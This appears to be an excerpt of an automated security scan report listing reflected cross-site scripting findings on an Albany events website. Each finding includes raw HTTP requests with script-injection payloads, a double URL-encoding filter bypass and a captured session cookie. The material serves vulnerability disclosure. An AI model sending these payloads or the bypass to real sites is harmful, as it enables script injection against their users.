GET /albany-ny/events/visual+arts228be%253cscript%253ealert%25281%2529%253c%252fscript%253e32854513461 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5555%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30292223dfa was submitted in the REST URL parameter 3. This input was echoed as a5555"><script>alert(1)</script>30292223dfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albany-ny/events/visual+artsa5555%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30292223dfa HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
4.417. http://events.cbs6albany.com/albany-ny/events/visual+arts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/albany-ny/events/visual+arts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a03"><script>alert(1)</script>ad406b8e27b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-ny/events/visual+arts?32a03"><script>alert(1)</script>ad406b8e27b=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/albany-ny/events/visual+arts?32a03"><script>alert(1)</script>ad406b8e27b=1" /> ...[SNIP]...
4.418. http://events.cbs6albany.com/albany-ny/movies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/albany-ny/movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437b9"><script>alert(1)</script>e4ff51d4685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-ny/movies?437b9"><script>alert(1)</script>e4ff51d4685=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/albany-ny/movies?437b9"><script>alert(1)</script>e4ff51d4685=1" /> ...[SNIP]...
4.419. http://events.cbs6albany.com/albany-ny/restaurants [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/albany-ny/restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 670ce"><script>alert(1)</script>fe260681d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-ny/restaurants?670ce"><script>alert(1)</script>fe260681d26=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9fe"><a>3c7d630f61a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /albany-nyfd9fe"><a>3c7d630f61a/venues HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/albany-nyfd9fe"><a>3c7d630f61a/venues" /> ...[SNIP]...
4.421. http://events.cbs6albany.com/albany-ny/venues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/albany-ny/venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901f7"><script>alert(1)</script>71466104ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-ny/venues?901f7"><script>alert(1)</script>71466104ed=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/albany-ny/venues?901f7"><script>alert(1)</script>71466104ed=1" /> ...[SNIP]...
4.422. http://events.cbs6albany.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c2f3"><script>alert(1)</script>52e176f2774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /glens-falls-ny/venues/show/185044-glens-falls-civic-center?5c2f3"><script>alert(1)</script>52e176f2774=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center?5c2f3"><script>alert(1)</script>52e176f2774=1" /> ...[SNIP]...
4.423. http://events.cbs6albany.com/movies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c294"><script>alert(1)</script>4c316537d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?1c294"><script>alert(1)</script>4c316537d45=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies?1c294"><script>alert(1)</script>4c316537d45=1" /> ...[SNIP]...
4.424. http://events.cbs6albany.com/movies/show/261885-127-hours [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/movies/show/261885-127-hours
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8199d"><script>alert(1)</script>27e8499e0f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies/show/261885-127-hours?8199d"><script>alert(1)</script>27e8499e0f3=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies/show/261885-127-hours?8199d"><script>alert(1)</script>27e8499e0f3=1" /> ...[SNIP]...
4.425. http://events.cbs6albany.com/movies/show/272945-black-swan [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/movies/show/272945-black-swan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d205"><script>alert(1)</script>ffdf17a191f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies/show/272945-black-swan?7d205"><script>alert(1)</script>ffdf17a191f=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies/show/272945-black-swan?7d205"><script>alert(1)</script>ffdf17a191f=1" /> ...[SNIP]...
4.426. http://events.cbs6albany.com/movies/show/299065-the-kings-speech [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/movies/show/299065-the-kings-speech
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76ea0"><script>alert(1)</script>a87ae6cc1e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies/show/299065-the-kings-speech?76ea0"><script>alert(1)</script>a87ae6cc1e7=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
